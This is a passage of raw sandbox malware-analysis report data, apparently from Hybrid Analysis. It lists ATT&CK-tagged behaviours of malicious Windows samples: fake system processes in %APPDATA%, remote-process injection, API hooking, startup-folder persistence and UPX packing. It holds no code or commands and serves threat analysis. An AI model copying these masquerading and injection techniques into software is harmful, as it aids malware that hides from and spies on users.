\"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"K:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"L:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"M:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"N:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"O:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"P:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"Q:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"R:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"S:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"T:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"U:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"V:\"\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" (UID: 00000000-00005064)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006060)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005952)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004164)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006124)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006056)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004240)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002532)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003812)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002828)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002852)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003980)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000352)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002816)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003528)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004264)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004280)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003912)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000344)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002240)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004132)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003748)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003480)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003124)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003560)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003556)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001728)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003200)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003216)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003232)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000304)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001888)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001100)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001860)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003796)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002404)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001480)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003628)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00001476)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001028)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004092)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003948)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003576)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003652)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004396)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002580)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001220)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003472)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003600)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 384)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 580)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 580)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 580)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 612)\n \"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 612)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 368)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\" allocated memory in \"C:\\80cf07a54232788852b8f475498fcc1f176e8b4a1a5de92fe99dd0dbcf4f9434.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004164)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006124)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004240)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002532)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002828)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002832)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003980)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000352)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002816)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004264)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003912)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000344)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004132)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003748)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003480)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003560)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003556)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001728)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003200)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003216)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000304)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001888)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001860)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003796)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002404)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001480)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003628)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001476)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001028)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003948)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003576)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003652)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004396)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002580)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001220)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003472)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003600)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002236)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002992)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00001276)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004316)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003096)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002200)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"4k51k4.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"4k51k4.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a
https://hybrid-analysis.com/sample/1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a
Hybrid Analysis - Killers
{"size": 73023, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a", "sha256": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a", "av_detect": 91, "vx_family": "Malware.PfPk.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 2, "total_signatures": 208, "extracted_files": [{"name": "1681.lnk", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1681.lnk", "file_size": 449, "sha256": "331939a00efce9cab0dc7e690b7be7de0e3d2378f7ea48640bc80ead177332ec", "type_tags": ["lnk"], "description": "MS Windows shortcut, Item id list present, Has Working directory, Archive, ctime=Wed Jul 7 07:21:24 2010, mtime=Wed Jul 7 07:21:24 2010, atime=Wed Jul 7 07:21:24 2010, length=0, window=hide", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "explorer.exe", "file_path": "%COMMONPROGRAMFILES%\\microsoft shared\\explorer.exe", "file_size": 73023, "sha256": "1bd3a3308a88f2a208d59bd22635b6c3eef8c434d8058947fd8cbf8615dce24a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "explorer.exe (PID: 5848)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "uiui8.dll", "file_path": "%COMMONPROGRAMFILES%\\uiui8.dll", "file_size": 17920, "sha256": "9f74dd4e355f702a7dd837661afef4c8da312479f20434af2893aa7d29b16681", "type_tags": ["pedll", "executable"], "description": "PE32 